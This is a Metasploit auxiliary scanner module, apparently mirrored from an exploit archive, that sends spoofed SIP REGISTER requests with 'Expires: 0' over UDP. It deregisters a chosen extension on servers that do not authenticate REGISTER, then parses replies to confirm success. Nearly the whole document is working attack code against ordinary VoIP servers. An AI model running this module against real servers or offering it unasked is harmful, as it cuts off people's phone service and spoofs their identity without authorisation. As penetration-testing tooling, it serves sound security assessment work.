## https://sploitus.com/exploit?id=PACKETSTORM:180715
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SIP Deregister Extension',
'Description' => %q{
This module will attempt to deregister a SIP user from the provider. It
has been tested successfully when the sip provider/server doesn't use REGISTER
authentication.
},
'Author' => [ 'ChrisJohnRiley' ],
'License' => MSF_LICENSE
)
deregister_udp_options
register_options(
[
Opt::RPORT(5060),
OptString.new('SRCADDR', [true, "The sip address the spoofed deregister request is coming from",'192.168.1.1']),
OptString.new('EXTENSION', [true, "The specific extension or name to target", '100']),
OptString.new('DOMAIN', [true, "Use a specific SIP domain", 'example.com'])
])
register_advanced_options(
[
OptAddress.new('SIP_PROXY_NAME', [false, "Use a specific SIP proxy", nil]),
OptPort.new('SIP_PROXY_PORT', [false, "SIP Proxy port to use", 5060])
])
end
def setup
# throw argument error if extension or domain contain spaces
if datastore['EXTENSION'].match(/\s/)
raise ArgumentError, "EXTENSION cannot contain spaces"
elsif datastore['DOMAIN'].match(/\s/)
raise ArgumentError, "DOMAIN cannot contain spaces"
end
end
def run_host(ip)
begin
src = datastore['SRCADDR']
ext = datastore['EXTENSION']
dom = datastore['DOMAIN']
sphost = datastore['SIP_PROXY_NAME']
spport = datastore['SIP_PROXY_PORT'] || 5060
conn_string = "#{ext}@#{dom}"
# set Route header if SIP_PROXY is set
if not sphost.nil? and not sphost.empty?
route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"
end
connect_udp
print_status("Sending deregistration packet to: #{conn_string}")
print_status("Using SIP proxy #{sphost}:#{spport}") if route
req = "REGISTER sip:#{dom} SIP/2.0" + "\r\n"
req << route if route
req << "Via: SIP/2.0/UDP #{src}" + "\r\n"
req << "Max-Forwards: 70" + "\r\n"
req << "To: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"
req << "From: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"
req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n"
req << "CSeq: 1 REGISTER" + "\r\n"
req << "Contact: *" + "\r\n"
req << "Expires: 0" + "\r\n"
req << "Content-Length: 0" + "\r\n\r\n"
udp_sock.put(req)
response = false
while (r = udp_sock.recvfrom(65535, 3) and r[1])
response = parse_reply(r)
end
# print error information if no response has been received
# may be expected if spoofing the SRCADDR
print_error("No response received from remote host") if not response
rescue Errno::EACCES
ensure
disconnect_udp
end
end
def parse_reply(pkt)
# parse response to check if the ext was successfully de-registered
if(pkt[1] =~ /^::ffff:/)
pkt[1] = pkt[1].sub(/^::ffff:/, '')
end
resp = pkt[0].split(/\s+/)[1]
rhost,rport = pkt[1], pkt[2]
if(pkt[0] =~ /^To\:\s*(.*)$/i)
testn = "#{$1.strip}".split(';')[0]
end
case resp.to_i
when 401
print_error("Unable to de-register #{testn} [401 Unauthorised]")
when 403
print_error("Unable to de-register #{testn} [403 Forbidden]")
when 200
print_good("#{testn} de-registered [200 OK]")
else
print_error("#{testn} : Undefined error code #{resp.to_i}")
end
return true # set response to true
end
end